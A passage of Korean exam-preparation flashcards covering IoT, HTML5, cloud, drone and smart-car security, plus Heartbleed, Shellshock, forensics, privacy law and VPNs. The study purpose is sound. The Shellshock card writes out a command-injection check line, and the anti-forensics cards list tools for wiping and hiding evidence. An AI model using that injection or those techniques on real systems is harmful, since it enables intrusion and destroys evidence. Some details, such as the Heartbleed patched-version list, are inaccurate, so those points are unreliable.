- RFID 태그/리더, 휴대전화, 센서, 노트북, 액츄에이터
6) 프로세싱
- 서비스, 센서 네트워크, 글로벌 센서 네트워크
7) 위치식별 및 트래킹
- RFID, GSM, GPS, 센서
8) 식별
- RFID, 바코드, 2D태그, 바이오인식, 영상판독
▣ 기술요소
1) 센싱
- 온도, 습도, 열, 가스, 초음파
- RFID, USN
2) 유성통신 
- 이터넷, PLC
3) 이동토통신
- GSM/GPRS/EDGE, 와이맥스, 와이브로
4) 무선랜 : Zigbee, 블루투스, RFID, MFC, 6LowWAN
▣ 보안 요구사항
- 저사양 디바이스 보안 기술
- 디바이스 관리 기술 개발
- 프로토콜 상호 윤용성 확보
- 네트워크 장비 모니터링
- 상호인증 키 관리/신뢰 관리
- 개인정보 수집제어
▣ IoT 플랫폼 보안 기술
1) 디바이스 보안 기술
- 경량암호화 : PRESENT, Katan, Ktantan, HummingBird, Hight
- 경량무결성 : SHA-3, Quark, Photon, Spongent
- 경량 인증 : ECC
- wi-fi 보안 : AES-CCMP
- zigbee보안 : AES-CCM*
- DASH-7 보안 : AES, SHA1, CCM-7, HummingBird
- Bluetooth보안 : SAFER+, AES-CCM
2) 서비스 보안 기술
- 웹 서비스 보안 : WS-Security, XML Signature, XKMS2.0, SOAP-SEC, SAML, XACML, CoAP
- ID관리 기술 : OpenID, e-IDMS, OAuth
125
Q

IoT 생명주기 단계별 보안 (IoT 공통 보안 7원칙)

A
▣ IoT 장치 설계/개발 보안
1) 정보보호와 프라이버시 강화를 고려한 IoT 제품, 서비스 설계
- Security by Design
- Privacy by Design
2) 안전한 소프트웨어 및 하드웨어 개발 기술 적용 및 검증
- 시큐어 코딩, 시큐어 HW
▣ 배포 설치/구성 보안
3) 안전한 초기 보안 설정 방안 제공
- Secure by Default
4) 보안 프로토콜 준수 및 안전한 파라미터 설정
- 암호, 인증, 인가
▣ IoT 장치 운영/관리/폐기 보안
5) IoT 제품,서비스의 취약점 보안패치 및 업데이트 지속 이행
- SW/HW 취약점 모니터링
6) 안전한 운영-관리를 위한 정보보호 및 프라이버시 관리체계 마련
- 취득-사용-폐기 관리
7) IoT 침해사고 대응체계 및 책임 추적성 확보 방안 마련
- 보안 사고 대비
126
Q

HTML5 보안위협

A
▣ HTML5 주요기능
- Web Form : Markup, Attribute, Event
- Canvas : Immediate Mode
- SVG : Scalable Vector Graphic
- Video/Audio
- Geolocation
- Offline Web Application : 캐싱
- Web SQL Database
- Local Storage : Cookie
- Web Socket : full-duplex
- Web Worker : thread
▣ 보안위협
1) XSS(Cross Site Scripting)
- 취약 : onform input공격
- 대응 : 점검리스트 업데이트 및 취약점 분석
2) XDM(Cross Document Messaging)
- 취약 : 상이한 도메인의 프레임 간 통신
- 대응 : 발송처 확인(Origin Check)
3) CORS(Cross Origin Resource Sharing)
- 취약 : 상이한 도메인 간 통신
- 대응 : 발송처 설정 주의
4) WebSocket
- 취약 : 방화벽 우회 리버스쉘 악용
- 대응 : 일반 TCP소켓과 다른 프로토콜 이용
5) Local Storage
- 취약 : DB에 저장된 이메일, 로그인 정보 취득
- 대응 : 중요정보 별도 저장, SSL 사용, 유일한 DB명 사용
6) Inline Multimedia SVG
- 취약 : third party 프로그램 취약점 브라우저내 존재
- 대응 : 브라우저 취약점 지속적 검토 개선
7) Input Validation
- 취약 : 클라이언트/서버 검증 코드 부재
- 대응 : 서버측의 엄격한 검증코드 필요
8) Attribute Abuse
- 취약 : 새로운 속성값들이 스크립트 자동실행 트리거가 될 경우
- 대응 : 서버측의 엄격한 검증코드 필요
127
Q

openSSL의 HeartBeat 취약점 공격, 하트블리드

A
▣ 개념
- openSSL TLS의 HeartBeat Message의 size를 틀리게 하여 서버내 저장되어 있는 개인정보를 Client에게 Reply해주는 SSL의 버그
▣ 특징
- 손쉬운 사용
- 검출의 어려움
▣ 문제점
- 서버가 클라이언트로부터 전달받은 정보의 내용과 그 정보의 길이의 일치 여부를 검증하지 않은 채 정보를 보내주면서 문제 발생
▣ 공격방법
- nmap 이용
- openSSL 이용
▣ 버전
- 취약버전 : 1.0.1, 1.0.2-베타
- 패치버전 : 1.0.1g, 1.0.0, 0.9.8
▣ 대응방안
- 시스템 측면 : 1.0.1g 로 업글, Heartbeat 미사용 컴파일
- 네트워크 측면 : 취약점 공격 탐지 및 차단 패턴 적용, 패턴 업데이터 적용 권고
- 서비스 측면 : 인증서 재발급, 사용자 비밀번호 재설정
128
Q

ShellShock

A
▣ 정의
- Bash 명령어 해석기 함수를 환경변수로 저장하는 방식에 대한 취약점 문제
▣ 확인방법
- 확인코드 : env x='() echo vulnerable' bash -c "echo test"
▣ 공격방법
- env x=() 함수 뒤에 자신이 원하는 명령 삽입
▣ 대응방법
- 보안 업데이트
- 배포판 전환
- 다른 쉘 설치
129
Q

Anti Exploit 공격

A
▣ 정의
- 개별 프로그램마다 최신 업데이트를 하거나 패치가 개발될 때까지 기다리지 않아도 해당 프로그램의 취약점을 노린 공격을 미리 파악해 막아주는 기술
▣ 특징
- 실시간 차단
- 사전 대응
▣ 목적
- 제로데이 취약점 등의 취약점 공격 탐지
▣ 알려진 취약점
- 공격행위 자체를 탐지 및 차단
▣ 악성코드 치료
- 치료 기능 없음
▣ SW 업데이트 주기
- 기능 및 모델 업데이트
▣ 시그니처 DB
- 실시간 분석을 하기 때문에 DB 불필요
▣ 보안전략
- Stop : 공격자체를 무조건 막아내고
- Analysis : 어떤 공격이었는지를 실시간으로 분석하여
- Response : 대응까지 동시에 이루어 지도록 하는
- S-A-R 프로세스
▣ 보호대상
- 취약점 공격이 자주 발생하는 소프트웨어 자체를 보호
130
Q

카멜레온 바이러스

A
▣ 정의
- 보호대책이 취약한 와이파이 AP를 찾아 바이러스 감지 기능을 우회 침투하여 해당 AP 네트워크에 연결되어 있는 모든 컴퓨터에서 데이터를 수집하는 바이러스의 한 종류
▣ 위험성
- 뛰어난 은닉성
- 스스로 확산
▣ 전파단계
- AP 목록화
- 암호화 우회
- 관리 인터페이스 우회
- 설정 백업
- 펌웨어 교체
- 백업설정 적용
- 바이러스 전파
▣ 대응기술
1) 802.11 보안
- 기밀성/무결성 : TKIP, CCMP, WPA, WPA2
- 접근제어 : 802.1x
- 인증 및 키관리 : EAP
2) 디바이스 식별기술
- 프로토콜 분석방식 : OUI분석, 순차번호 분석, OS지문
- 위치인식 방식 : 무선랜 측위, RSS 지문
- RF 지문 방식 : 변조, 전이 시그널
131
Q

클라우드 컴퓨팅 보안

A
▣ 필요성
- 데이터 집중화에 따른 위험 증가
▣ 보안 위협
- 운영상실
- 내부에의 잠금
- 고립실패
- 보증위협
- 관리 인터페이스 손상
- 데이터 보호
- 불완전한 데이터 삭제
- 악의적 내부 사용자
▣ 대응방안
1) 플랫폼
- 접근제어
- 사용자 인증
2) 스토리지
- 검색가능 암호 시스템
- PPDM
3) 네트워크
- SSL, IPSec, Firewall, Anti-DDos
4) 단말
- TPM, CryptoCell, Virtualization Security
132
Q

클라우드 환경의 보안기술

A

1) 기밀성과 데이터 암호화
- 암호 알고리즘
- 암호 키 관리
- 암호 응용 기술
2) 사용자 인증 및 접근 제어
- 일반적 인증 : ID/PW, PKI, Multi Factor, SSO
- 네트워크 인증 : 통합 인증서버, ID 연계 기반, URL 기반, User-Centric
- 기업 인증 : Enterprise IAM
3) 데이터 무결성
- PKI
- 전자서명
- SHA
4) 가용성 및 복구
- 재난 복구 준비
- 운영중단 요인 식별
- 실시간 정보 확보
- 재난예방책, 대응책마련
5) 가상화 보호
- 가상머신 백신 설치, 관리
- 가상머신 모니터링 및 로깅
- 가상머신 간 격리 설정
- 가상머신 스케쥴링 관리
- 불법 통신포트 차단/암호화
- 가상 이미지 백업 및 관리
- 서비스 및 자원 흐름 통제
- 에러 처리 관리
- 최신 보안 패치 적용
- 환경별 암호기법 적용
- 사용자 인증 권한관리
- 입력값 유효성 검증
- SLA 수준 확립
6) 네트워크 및 웹 보안
- IDS, Firewall, IPSEc, VPN, https
7) 공격 모델 시뮬레이션
- 모의 해킹 훈련

133
Q

가트너 - 클라우드 컴퓨팅 7대 위협

A

1) 접근권한에 관한 정보
- 인력 관리 정보확인
2) 규정의 준수
- 외부 감사, 보안 인증
3) 데이터의 위치
- 처리 위치 은닉
4) 데이터의 분리여부 파악
- 데이터 암호화
5) 데이터 복구
- 복구 시간 최소화
6) 불법행위 등에 대한 조사
- 모니터링, 책임소재 규명
7) 기업의 지속성
- 폐업, 인수, 합병시 가용성 보장

134
Q

CSA(Cloud Security Alliance) - 클라우드 컴퓨팅 7대 위협

A

1) 클라우드 컴퓨팅 남용 및 불손한 사용
2) 안전하지 않은 애플리케이션 프로그래밍 인터페이스
3) 악의를 가지고 있는 내부 관계자
4) 공유기술의 취약점
5) 데이터 손실 및 유출
6) 계정 서비스 및 트래픽 하이재킹
7) 공개되지 않은 위험

135
Q

RSA - 클라우드 정보보호 가이드

A

1) 신뢰관계 구축
- 신뢰를 높이기 위한 정책설정
- 보안요구사항 해결능력 평가
- 다중사용 및 데이터 독립성에 대한 보안
- 관리자 권한의 분리
- 가상머신 관리
- 데이터 암호화 및 구분
- 통합 계정 관리정책 적용
2) 사기범죄 보호
- 효과적인 인증서비스 구현
- 악성코드 공격을 막기 위한 다단계의 방어기능 구축
- 클라우드 서비스의 악용방지
3) 데이터 관리 규정 준수
- 클라우드 업체 상호간의 규정준수
- 클라우드 서비스 이용 시 법적 규정 준수

136
Q

클라우드 가상화 환경에서의 주요 위협

A

1) 게스트 OS 간의 영향으로 인한 위협
- 게스트 OS간 악성코드 전달
- 소프트웨어 취약점 악용
- 자원의 독점으로 인한 위협
2) 게스트 OS에서 호스트, 가상화 관리모듈, 하드웨어로의 위협
- 게스트 OS에서의 취약점 악용
- 자원의 남용
3) 게스트 OS 자신으로의 위협
- 가상화 이전의 단일 호스트상의 문제가 가상환경의 게스트 OS 내에서 발생
4) 외부로부터 호스트, 가상화, 관리모듈, 하드웨어로의 위협
- 가상머신 환경의 취약점을 악용
- 외부에서 오는 모든 트래픽 및 사용자 요구들이 위협으로 인식
5) 가상화 관리 모듈에서 전체 시스템으로의 위협
- 가상화 관리 모듈은 게스트 OS의 모든 관리를 수행하여 가상화 관리 모듈에서 악성코드 실행시 게시트 OS와 전체 하드웨어에 전달
6) 하드웨어에서 가상환경 관리모듈로의 위협
- 하드웨어적인 문제가 각 게스트 OS에 영향

137
Q

무인항공기 보안

A
▣ 무인항공기 시스템 보안 취약 특징
- 구조 : Tightly Coupled
- 장치 : 무선 및 센서 장비
- SW : 센서 의존적 SW
▣ 무인항공기 기본구조
- 구동기 신호
- 센서 신호
- 제어기
- 제어 네트워크
- C3 (Command, Control, Communication)
- GCS (Ground Control Station)
▣ 보안 취약점
1) 센서부
- GPS 재밍
- 자기계 교란
- 자이로스코프 해킹
- 영상교란, 다운로드
2) 구동부
- 구동기 신호 교란
- 제어기 해킹
3) 네트워크
- 제어 네트워크 해킹, 교란
- C3 재밍 명령 위변조
▣ 보완 대책
1) 센서부
- GPS 대체 센서 : 별 추적, 양방향 시간 전송 이용
- 외부 전파 차폐
- 다중 소스 항법
- 영상 암호화
2) 구동부
- 군용 특화 신호체계 사용
- 제어 소프트웨어 보완
3) 네트워크
- 암호화 기술 개선
- 자율비행 기술 개선
▣ 국제 표준화 현황
- RTCA : C3 운용 표준, 정보보안 표준화 작업 진행
- HACMS : 보안 안전 드론 프로젝트 추진
▣ 현실적인 표준 적용
- DO-178/254 적용
- Common Criteria
138
Q

스마트카 보안 위협

A
▣ 정의
- 자동차와 ICT 기술이 융합된 스마트카를 대상으로 사용자 정보유출, 비인가 원격제어, 기기 오작동 유발 등 악의적인 해킹 공격에 의한 보안위협
▣ 이슈사항
- 차세대 스마트카 시장 확대
- ECU(전자제어장치), 네트워크기술, SW 탑재
▣ 스마트카 보안 위협 유형
- 통신(V2X) 도청 : 통신 도청
- 통신(V2X) 추적 : 통신 추적
- 가짜 RSU를 통한 데이터 훼손 : 가짜 교통 상황정보 전송
- V2X 통신 재밍 : 사고유발, 주행 방해
- GPS 신호 재밍 : GPS신호 수신 방해
- GPS 신호 스푸핑 : 가짜 GPS 신호 전송
- 비정상 SW 업데이트 : 강제 다운그레이드 해킹
- OBD-II 해킹 : 악의적 CAN 메시지 전송
- (비인가 차량) V2X 통신 DoS : 대량의 V2X 메시지 전송
- 원격 통신을 통한 악성코드 감염 : MP3 스트리밍을 통한 감염
- 내부 통신을 통한 악성코드 감염 : USB, Bluetooth
- 악성 앱을 통한 악성코드 감염 : 정상 앱 가장한 악성코드
- 비 허가, 권한 없는 사용자가 정보 무단 사용
- C-ITS 기반 시설에 대한 DDoS 공격
- 수집 정보를 제3자에게 무단 제공 활용
- (정상차량) V2X 통신 DoS(Flooding)
- 원격 비정상 접근 (원격해킹)
- CAN 통신 메시지 퍼징을 통한 ECU 해킹
▣ 대응방안
1) 스마트카
2) V2V
3) V2I
4) Infra
5) I2C
6) C-ITS
139
Q

스마트카 보안위협 대응방안

A
▣ 스마트카
1) 보안 취약점
- V2X 통신 방해(재밍, DDoS)
- GPS 신호 수신 방해(재밍, 스푸핑)
- 전자제어장치(ECU 해킹)
- 차량자가진단 포트(OBD II) 해킹
2) 보안 위협
- 정상운영 방해, 사고유발
- 차량 무단 탈취
3) 보안 기술
- 스마트카 방화벽
- 차량용 소형 GPS 항재밍 기술
- 스마트카 전용 백신
- 침입방지 시스템
▣ V2V
1) 보안 취약점
- 차량 간(V2V) 통신 도청, 추적
- 차량 간 통신 방해
- 비인가 차량 등을 통한 거짓 교통 상황 정보 전송
2) 보안 위협
- 차량 위치정보 등 개인/운행 정보 무단 획득
- 정상운영 방해, 사고유발
3) 보안 기술
- V2V 통신 암호화
- 스마트카 방화벽
0 차량 간 상호 인증 기술
▣ V2I
1) 보안 취약점
- V2I 통신 도청, 추적
- V2I 통신 방해
- 비인가 인프라 등을 통한 거짓 교통 상황 정보 전송
2) 보안 위협
- 차량 위치정보 등 개인/운행 정보 무단 획득
- 정상운행 방해, 사고유발
3) 보안 기술
- V2I 통신 암호화
- 스마트카 방화벽
- V2I 상호 인증 기술
▣ Infra
1) 보안 취약점
- 원격 비정상 접근 (원격 해킹)
2) 보안 위협
- 주행 정보 등 개인/운행 정보 무단 사용
- 정상운행 방해, 사고유발
- DDoS 공격을 통한 서비스 방해
3) 보안 기술
- 개인/운행 정보 보호 기술
- 방화벽
- DDoS 대응
▣ I2C
1) 보안 취약점
- 인프라교통센터 통신 도청, 추적
- 비인가 인프라 등을 통한 거짓 교통 상황 정보 전송
2) 보안 위협
- 차량 위치정보 등 개인/운행 정보 무단 획득
- 정상운행 방해, 사고유발
3) 보안 기술
- 개인/운행 정보 보호 기술
- 방화벽
- DDoS 대응
- I2C 통신 암호화
▣ C-ITS
1) 보안 취약점
- 원격 비정상 접근(원격해킹)
2) 보안 위협
- 주행 정보 등 개인/운행 정보 무단 사용
- C-ITS 서비스 방해
- DDoS 공격을 통한 서비스 방해
3) 보안 기술
- 개인/운행 정보 보호 기술
- 방화벽
- DDoS 대응
140
Q

컴퓨터 포렌식

A
▣ 정의
- 전자적 증거물 등을 사법기관에 제출하기 위해 데이터를 수집, 분석, 보고서를 작성하는 일련의 작업
▣ 원칙 (정재신연무)
- 정당성의 원칙 : 위법수집증거 배제 법칙
- 재현의 원칙 : 현장 검증 재현
- 신속성의 원칙 : 휘발성 정보 지체 없이 진행
- 연계 보관성 : 담당자와 책임자 연계
- 무결성의 원칙 : 인과관계
▣ 분석 유형
- 사고대응 포렌식
- 정보추출 포렌식
▣ 절차 (수증보분결)
- 수사준비
- 증거물획득
- 보관 및 이송
- 분석 및 조사
- 보고서작성
▣ 기술
1) 증거수집 기술
- 라이브시스템 메모리 덤프
- 라이브 시스템 하드 디스크 이미징
- 저장매체 복제 및 이미지 인식 기술
- 저장매체 복구기술
- 네트워크 정보 수집 기술
- 디지털 증거 보관 기술
2) 증거분석 기술
- 데이터 복구
- 파일 복구
- 암호 복구
- DB 재조립
- 완전 삭제 복구
- Timeline 분석
- 슬랙공간 분석
- 로그분석
- 레지스트리 분석
141
Q

네트워크 포렌식

A
▣ 정의
- 네트워크 환경을 조사하여 수사 단서를 발견하는 포렌식 기법
▣ 절차 및 기술
- 준비 : 법적근거, 영장
- 사고탐지&amp;대응 : TCPDump, Wireshark, PADS, Sebek, Ntop, Snort
- 수집 : TCPFlow, NfDump, SiLk, TCPReplay
- 보존 : 수집기술과 유사
- 조사 : Flow-tools, PADSD, ARgus, TCPTrace, TCPStat, NetFlow
- 분석 : 조사기술과 유사
- 수사 : 공격자은닉기술(IP Spoofing, Stepping Sone Attack)
- 제출 : Reporting 도구
▣ 네트워크 포렌식의 분류
- 인터넷 포렌식 : www, ftp, usenet
- 전자우편 포렌식 : 헤더 분석, 수신자 추적
▣ 분석방법
- 온라인 시스템 분석 방법 : 서비스 중인 서버 원격 접속 분석
- 격리 분석 방법 : 네트워크 차단 후 분석(훼손 변조 예방)
- 슬레이브 분석 방법 : 증거물, 파일 검색
142
Q

모바일 포렌식

A
▣ 정의
- 모바일 기기를 대상으로 디지털 증거를 수집, 식별, 추출, 보존, 문서화 하는 과학적이고 논리적인 절차와 방법
▣ 분야
- PDA, 휴대폰, 네비게이션
▣ 절차
- 현장보존
- 증거확보
- 데이터 수집 및 분석
- 보고서 작성
▣ 추출도구
- QPST, EasyCDMA, BitPim
▣ 분석기술
- File Signature 분석 : File Magic Number
- File Hash 분석 : MD5, SHA1
- Timeline 분석 : MAC Time
- Window Registry 분석 : Encase, RegRipper
143
Q

스마트폰 포렌식

A
▣ 정의
- 스마트폰을 대상으로 디지털 증거를 수집, 식별, 추출, 보존, 문서화 하는 과학적이고 논리적인 절차와 방법
▣ 스마트폰 포렌식의 데이터
1) 기본 어플리케이션 포렌식 데이터
- 연락처, 통화목록, 문자 메시지, 캘린더, 이메일, 웹 히스토리, GPS 데이터, 멀티미디어, IMEI(국제 모바일기기 식별코드), IMSI(국제 이동국 식별번호), MAC 주소
2) 사용자 설치 어플리케이션 포렌식 데이터
- m-VOIP 정보, 문자메시지, SNS정보, 클라우드 서비스 정보, 키관리 어플리케이션 정보, 금융 어플리케이션 정보
▣ 절차
1) 현장 보존
- 증거훼손방지, 촬영, 캡처
2) 증거의 확보
- 네트워크 차단, 전원 공급
3) 데이터수집 및 분석
- 데이터 법적효력 고려한 수집/분석
4) 보고서 작성
- 증적 분석의 객관성 유지
- 과정의 보고서화
▣ 논리적 추출 포렌식 도구
- XRY Logical
- UFED Touch Logical
- MPE+
- CellXtract
▣ 논리적 추출 방법 사례
1) 안드로이드
- 메모리 파티션 확인
- 루팅 : 슈퍼유저
- 데이터 추출 : Android Debug Bridge
2) iOS
- 데이터 유형 결정 : 일반, 암호화
- 탈옥 : 슈퍼유저
- 데이터 추출 : iTunes
▣ 물리적 추출 포렌식 도구
- XRY Physical
- UFED Touch Ultimate
- MPE+
- MD-Smart
▣ 물리적 추출방법 사례
- 운영체제에 기반한 방법
- JTAG포트를 이용한 방법
- 메모리 직접 분리 방법
- Flasher Box 이용 방법
- Boot Loader 이용방법
144
Q

클라우드 포렌식

A
▣ 주요이슈
- 분산처리 시스템
- 재판 관할권
- 데이터 암호화 처리
- 수사의 복잡성 증대
- 수사 시간의 소요증대
- 지침서 미존재
▣ 수사현황
- 백업환경
- 법저제약
- 데이터 복구 문제
- 증거자료 획득 가능성
- 압수수색
▣ 수사절차
- 현장실사
- 증거물 획득
- 증거물 보관
- 증거물 제출/보고
145
Q

안티 포렌식

A
▣ 목적
- 탐지회피, 정보수집 방해
- 조사관의 분석시간 증가
- 포렌식 도구 오작동, 오류발생
- 범죄도구은닉, 차단, 삭제
- 법적 증거로서 가치가 없도록 훼손
▣ 기술
1) 데이터 영구 삭제
- Disk Wipe
- Degausser
- Log Data 삭제
- 디스크 덮어쓰기
2) 암호화
- 압축파일 암호화
- 문서파일 암호화
- 물리적 암호화
3) 스테가노 그래피
▣ 대응기술
- 데이터 복구
- 암호검색
- 스테가노 그래피
146
Q

모바일 안티 포렌식

A
▣ 정의
- 디지털포렌식 기술에 대응하여 자신에게 불리하게 작용할 가능성이 있는 증거물을 훼손하거나 차단하는 일련의 행위
▣ 분야
1) 데이터 파괴
- 파일 분쇄 (복구 불가)
2) 데이터 은닉
- 암호화
- 스테가노 그래피
- 메모리, 슬랙공간, 배드블록
3) 데이터 조작
- 정보변조(Spoofing)
4) 데이터 출처 제거
▣ 모바일 안티포렌식 도구
1) Android
- File Shredder : 데이터 삭제
- iShredder : 데이터 삭제
- LUKS Manager : 데이터 삭제
- StegDroid Alpha : 데이터 은닉
- Steganography : 데이터 은닉
2) iOS
- iCrypter : 데이터 은닉
- iTreasure : 데이터 은닉
- iDelete : 데이터 삭제
▣ 모바일 안티포렌식 대응기술
- 스테가노 그래피 탐지
- 데이터 검색 및 탐지
- 데이터 복구
- 패스워드 검색
147
Q

개인정보보호

A

▣ 유출사고 발생원인
- 수집 : 동의위반, 고지의무, 민감정보수집금지, 과도한 정보수집, 불법 수단 이용 수집, 기망이유 수집
- 저장 : 유출/훼손/변경/공개, 관리적 물리적 기술적 조치 미비, 고객요구 불응 및 미조치, 외주 업체 관리
- 이용 : 무단제공/공유, 이용목적 위반, 무단이용
- 파기 : 목적 달성 후 미파기, 삭제 요구 불응
▣ 개인정보 위험도 분석 절차
1) 위험도 분석을 위해 개인정보 파일 및 고유 식별정보 보유 여부 등 현황 조사 (개인정보영향평가 기관)
2) 개인정보 파일 단위별 위험도 분석을 위해 항목별 점금을 수행 (개인정보영향평가 기관)
3) 위험도 분석 결과보고서를 작성하여 내부결재 후 보관 (개인정보처리자)
4) 점검 결과에 따라 고유식별정보 암호화 등을 수행 (개인정보처리자)
▣ 유출방지 보안 조치 사항
- 물리적 : 열쇠, 경비원, 울타리, 경비견, 경고, CCTV
- 기술적 : 정보은닉, 암호화, 인증, 침입 차단, 접근 제어
- 관리적 : 보안 정책, 보안조직 구성, 인력 보안 관리, 보안 감사, 보안 사고 조사

148
Q

개인정보 이용 절차에 따른 기술적 보호 조치

A
▣ 수집 (회원가입 및 제출서류)
- I-PIN, 고유 식별번호 외 인증
▣ 저장 (DB 저장)
- 접근권한관리(IAM/DB접근제어)
- 네트워크 접근 통제
▣ 이용/제공 (자료작성, 업무활용)
- DLP, 로그수집, 위변조 방지
▣ 파기 (서비스 탈퇴 및 정보 활용 완료)
- 영구삭제(SW, HW, 문서파쇄기)
149
Q

ISO 27001 통제항목 기준 개인정보 유출 방지 위한 보안조치 사항

A
▣ 관리적 보안 통제 실행 지침
1) 수집 관련 통제
- 수집목적, 이용기간, 제공처
2) 저장 및 관리에 대한 통제
- 접근권한 문서화, 노출 대응방안
3) 이용 관련 통제
- 동의 절차 명세화
4) 파기 관련 통제
- 파기 절차 명시, 보유 기간 근거
5) 인적 자원
- 고용 상태/종료/변동
▣ 물리적 보안 통제 실행 지침
1) 보안지역
- DLP, NAC
2) 장비보안
- SW제거, 데이터 포맷
- 반출 시간 설정, 반출입 대장 서명
▣ 기술적 보안 통제 실행 지침
1) 필터링 기술
- 네트워크 필터링 : 방화벽, IDS/IPS, TMS(Threat)
- 개인정보 노출차단 : 개인정보 스캐너
- 개인정보 침해차단 : 애드 브로커, 스파이웨어 필터, 스펨방지
2) 개인정보 통신
- 개인정보 은닉 : 리메일러, 경로 제거기, IP/쿠키 익명화
- 개인정보 암호화 : VPN, HTTPS
- 개인정보 인증 : i-PIN, PKI, OpenID
3) 개인정보 저장
- DB암호화 솔루션
- Secure OS
4) 개인정보 정책
- P3P (Platform for Privacy Preference)
150
Q

OECD 개인정보보호 8원칙

A
▣ 수집제한의 원칙
▣ 정보정확성의 원칙
▣ 목적명시의 원칙
▣ 이용제한의 원칙
▣ 안전성확보의 원칙
▣ 공개의 원칙
▣ 개인참가의 원칙
▣ 책임의 원칙
151
Q

ISO 2537 의료정보 데이터 익명화기법

A
▣ 개념
- 데이터에 포함된 개인 식별 정보를 삭제하거나 알아볼 수 없는 형태로 변환하는 기법
▣ 기법
- 가명처리
- 총계처리
- 데이터값 삭제
- 범주화
- 데이터 마스킹
152
Q

개인정보보호법

A
▣ 개인정보의 정의
- 살아 있는 개인에 관한 정보로서 성명, 주민등록번호 및 영상등을 통하여 개인을 알아볼 수 있는 정보
▣ 유형
- 식별 정보 : 주민등록번호
- 민감 정보 : 사상, 신념, 종교, 정치, 장애여부
▣ 주요조항
1) 보호의무 적용대상의 확대
- 공공/민간 부문 확대
2) 보호 범위의 확대
- 컴퓨터, 종이문서 포함
3) 고유식별정보 처리 제한
- 주민번호 처리 금지
4) 영상정보 처리기기 규제
- 카메라 조작, 녹음 금지
5) 개인정보 수집/이용/제공 기준
- 공공/민간 처리원칙 통일
6) 개인정보 유출 통지 및 신고제 도입
- 유출사실 통지, 전문기관에 신고
153
Q

개인정보관리책임자(CPO)

A
▣ 정의
- 조직에서 수집/이용되는 개인정보보호를 위하여 개인정보보호 계획 수립/시행/, 관리/감독, 유출사고 방지 및 대응을 수행하는 임원급 이상의 개인정보관리 총괄 책임자
▣ 역할
1) 개인정보보호 계획 수립 및 시행
- 개인정보보호 처리방침 수립
- 내부관리계획 수립
- 개인정보보호 교육계획 수립
2) 개인정보 처리실태 관리, 감독
- 내부 개인정보 보유현황 관리
- 개인정보 등록, 폐기 검토 및 승인
- 외주직원 위탁처리업무 감독
3) 개인정보 유출 예방 및 침해사고 대응
- 불만처리 및 피해구제
- 분야별 책임자 지휘, 감독
- 개인정보 유출, 오남용 예방
- 내부 통제 시스템 구축
154
Q

VPN (Virtual Private Network)

A
▣ 정의
- 터널링 기법을 사용해 공중망에 접속해 있는 두 네트워크 사이의 연결을 마치 전용회선을 이용해 연결한 것과 같은 효과를 내는 가상 네트워크
▣ 특징
- 서비스의 질 관리
- 신기술 접목 용이
- 관리 및 운영 비용 절감
- 기업 네트워크 확장 용이
▣ 구성
- Layer4 : SSL
- Layer3 : IPSec
- Layer2 : L2F, L2TP, PPTP, MPLS
▣ 구현기술
1) 인증
- LDAP, Radius, AD, OTP, TACACS++
2) 터널링
- L2F, PPTP, L2TP, IPSec
3) 암호화
- DES, AES, SEED
4) 키관리
- IKE(Internet Key Exchange)
▣ 구현방식에 따른 분류
- 방화벽 기반
- 라우터 기반
- 전용 VPN
▣ 차세대 VPN 종류
- IPSec VPN
- MPLS VPN
- SSL VPN
- Vo VPN
- Mobile VPN
▣ 도입시 고려사항
1) 도입사 측면
- 목표, 전략 검토
- 비용 검토 : ROI
- 기존 환경에서 적용 검토
- 보안 통합 기획
- 운영 및 평가
2) 기능 측면
- 터널링 기술과 구성형태
- 장애 복구시간
- 기존 NW환경 수용
- 상호 운용성
- 다양한 접속 자원
- 관리 편이성
- 확장성
- 안정성
155
Q

IPSec VPN

A
▣ 개념
- IPSec 프로토콜을 이용한 구현
- 전용 VPN 장비 기반 기술
▣ 동작계층
- 네트워크 계측 (3계층)
▣ 구성방법
- 랜투랜 : Site-to-Site, GW-to-GW
- 원격접속 : Site-to-Remote, GW-to-Remote
▣ 적합한 환경
- 일반적인 본사-지사간 VPN 환경
- C/S기반 어플리케이션 운영
▣ 표준
- RFC 2401
▣ 장점
- 보안수준과 암호화기능 뛰어남
- 다양한 환경에 적용, 고객이 어플리케이션과 독립적으로 운영
- 다양한 인터넷 접속기술 활용 가능
- 고객사 고유정책 반영
▣ 단점
- 높은 초기도입 비용, 각 지사 VPN 장비 필요
- 트래픽 제어 및 QoS 기능 미약
- 지속적인 관리비용 발생
- 대규모 원격 접속환경에는 다소 부족함
156
Q

MPLS VPN

A
▣ 개념
- MPLS망이 구성된 구간에서 Label을 이용하여 L2스위칭으로 고속전송되는 VPN 기술
▣ 동작계층
- 데이터링크 계층 (2, 3계층)
▣ 구성방법
- 랜투랜, 원격접속
▣ 적합한 환경
- 시간에 민감한 어플리케이션 운영 환경 (음성, 동영상)
▣ 표준
- RFC 2547
▣ 장점
- 확장성 : 동일 네트워크 다수 VPN
- 통합성 : 단일 네트워크에서 데이터, 음성, 비디오 처리
- 표준기술 : 이기종 호환성
- 트래픽 관리 기술 : QoS, CoS 제공
- 관리 편의성 : 별도의 투자, 관리 비용 없음
▣ 단점
- 동일 ISP 내부에서만 운영 가능
- 고객사 고유정책 반영 미약
- 공중망 정송 시 암호화 기능 미약
- 대역폭에 비해 고비용 구조
157
Q

SSL VPN

A
▣ 개념
- 보안통신 프로토콜을 통한 구현
▣ 동작계층
- 4. 전송계층, 7. 응용계층
▣ 구성방법
- 원격접속
▣ 적합한 환경
- 다수의 원격 사용자를 가진 환경
- 웹기반 어플리케이션 운영환경
▣ 장점
- 별도 장비없이 웹브라우저만으로 VPN 구현 가능
- 뛰어난 사용성, 관리 편의성
▣ 단점
- 적용 가능한 어플리케이션의 제한 (UDP 사용제한)
- SSL 자체의 부하(핸드쉐이킹 지연, 암호화/복호화 지연)
158
Q

VoVPN

A

▣ 개념
- VPN 인프라에서 VoIP서비스를 구현한 VPN 구조
▣ 장점
- VPN 암호화 통신에 음성데이터를 통합하거나 기존 VoIP에 VPN을 적용하여 비용절감 및 보안수준 향상

159
Q

Mobile VPN

A
▣ 개념
- 모바일 네트워크 구간에 VPN 암호화 기술 적용
- 모바일 IP, IPSec 및 SSL 등과 같은 보안표준을 기반으로 무선접속을 위해 특화된 VPN
▣ 적합한 환경
- 모바일 단말기 어플리케이션
▣ 장점
- 사용자는 로밍 시에도 접속상태를 유지 가능
- 끊기지 않는 애플리케이션 이전을 제공.
- 직원이 생산성 향상
- 고객만족 증가
▣ 단점
- 무선 네트워크 단말기에 위협 내재
- 사이버 범죄에 취약한 위험성 초래 가능
- 무선 보안 제품들에 대한 지식 부족
160
Q

WIFI 무선랜 보안, 802.11ai

A
